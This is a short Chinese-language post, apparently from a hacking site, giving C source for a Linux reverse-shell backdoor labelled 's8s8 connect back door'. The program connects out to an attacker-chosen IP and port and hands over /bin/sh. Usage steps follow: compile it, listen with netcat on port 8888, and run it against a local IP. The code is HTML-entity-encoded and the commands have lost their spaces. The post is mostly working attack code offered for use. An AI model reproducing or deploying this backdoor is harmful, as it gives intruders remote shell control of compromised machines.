Linux下反弹脚本之二

 
[pre]#include&nbsp;<stdio.h>&nbsp;#include&nbsp;<sys/types.h>&nbsp;#include&nbsp;<sys/socket.h>&nbsp;#include&nbsp;<unistd.h>&nbsp;#include&nbsp;<fcntl.h>&nbsp;#include&nbsp;<netinet/in.h>&nbsp;#include&nbsp;<netdb.h>&nbsp;void&nbsp;usage();&nbsp;char&nbsp;shell[]=&quot;/bin/sh&quot;;&nbsp;char&nbsp;message[]=&quot;s8s8&nbsp;welcome\n&quot;;&nbsp;int&nbsp;sock;&nbsp;int&nbsp;main(int&nbsp;argc,&nbsp;char&nbsp;*argv[])&nbsp;{&nbsp;if(argc&nbsp;<3){&nbsp;usage(argv[0]);&nbsp;}&nbsp;struct&nbsp;sockaddr_in&nbsp;server;&nbsp;if((sock&nbsp;=&nbsp;socket(AF_INET,&nbsp;SOCK_STREAM,&nbsp;0))&nbsp;==&nbsp;-1)&nbsp;{&nbsp;printf(&quot;Couldn't&nbsp;make&nbsp;socket!\n&quot;);&nbsp;exit(-1);&nbsp;}&nbsp;server.sin_family&nbsp;=&nbsp;AF_INET;&nbsp;server.sin_port&nbsp;=&nbsp;htons(atoi(argv[2]));&nbsp;server.sin_addr.s_addr&nbsp;=&nbsp;inet_addr(argv[1]);&nbsp;if(connect(sock,&nbsp;(struct&nbsp;sockaddr&nbsp;*)&server,&nbsp;sizeof(struct&nbsp;sockaddr))&nbsp;==&nbsp;-1)&nbsp;{&nbsp;printf(&quot;Could&nbsp;not&nbsp;connect&nbsp;to&nbsp;remote&nbsp;shell!\n&quot;);&nbsp;exit(-1);&nbsp;}&nbsp;send(sock,&nbsp;message,&nbsp;sizeof(message),&nbsp;0);&nbsp;dup2(sock,&nbsp;0);&nbsp;dup2(sock,&nbsp;1);&nbsp;dup2(sock,&nbsp;2);&nbsp;execl(shell,&quot;/bin/sh&quot;,(char&nbsp;*)0);&nbsp;close(sock);&nbsp;return&nbsp;1;&nbsp;}&nbsp;void&nbsp;usage(char&nbsp;*prog[])&nbsp;{&nbsp;printf(&quot;\t\ts8s8&nbsp;connect&nbsp;back&nbsp;door\n\n&quot;);&nbsp;printf(&quot;\t&nbsp;sql@s8s8.net\n\n&quot;);&nbsp;printf(&quot;Usage:&nbsp;%s&nbsp;<reflect&nbsp;ip>&nbsp;<port>\n&quot;,&nbsp;prog);&nbsp;exit(-1);&nbsp;}&nbsp;[/pre]
gcc-off.c

再在本机上监听一个端口

nc-l-p8888

再执行./f192.168.1.148888

注：反弹回来的shell没提示符。
&nbsp;


&nbsp;

*